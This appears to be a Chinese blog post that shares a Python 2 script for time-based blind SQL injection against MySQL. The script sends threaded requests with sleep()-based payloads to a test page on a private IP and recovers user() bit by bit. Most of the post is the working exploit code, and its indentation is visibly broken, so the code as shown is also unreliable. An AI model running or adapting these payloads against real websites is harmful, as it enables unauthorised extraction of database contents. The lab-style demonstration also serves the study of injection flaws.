python blind_injection.py demo for mysql

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

import urllib
import urllib2
import time
import threading
 
 
class blind_injection:
    def __init__(self,thread_num):
        	self.thread_count=self.thread_num=thread_num
        	self.lock=threading.Lock()
        		self.res={}
        		self.resdata={}
		        self.tmp=''
    def _request(self,URL):
        		user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
		        req = urllib2.Request(URL, None, user_agent)
        		try:
			            request=urllib2.urlopen(req,timeout=2)
        		    except Exception ,e:
			            #time.sleep(0.01)
			            return 'timeout'
		    return request.read()
 
    def bin2dec(self,string_num):
        	return int(string_num,2)
 
 
 
    def _getlength(self,ii):
        	thread_id=int(threading.currentThread().getName())
        	ii=ii+1
        	url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"
        	html=self._request(url)
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.res[str(ii)] = 0
		else:
        	    self.res[str(ii)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
    def _getdata(self,j,x):
        	url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        	html=self._request(url)
        	#print url
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.resdata[str(j)] = 0
		else:
        	    self.resdata[str(j)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
 
    def _getstep(self):
        	self.data=''
        	for x in range(self.datalength):
        	    x=x+1
        	    self.thread_count=8
        	    self.tmp=''
        	    for j in range(self.thread_num):
        	        j=j+1
        	        t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))
        	        t.setDaemon(True)
        	        t.start()
        	        while self.thread_count>0:
        	            time.sleep(0.01)
        	        for i in range(8):
        	            self.tmp=self.tmp+str(self.resdata[str(i+1)])
        	        self.data=self.data+chr(self.bin2dec(self.tmp))
        	    print self.data
 
 
 
 
    def run(self):
        for i in range(self.thread_num):
            t=threading.Thread(target=self._getlength,name=str(i),args=(i,))
            t.setDaemon(True)
            t.start()
            while self.thread_count>0:
                time.sleep(0.01)
            for i in range(8):
                self.tmp = self.tmp + str(self.res[str(i+1)]) 
            self.datalength=self.bin2dec(self.tmp)
            print 'length:'+ str(self.datalength)
            self._getstep()
 
 
if __name__=='__main__':
    d=blind_injection(thread_num=8)
    d.run()

python blind_injection.py demo for mysql》上有1条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>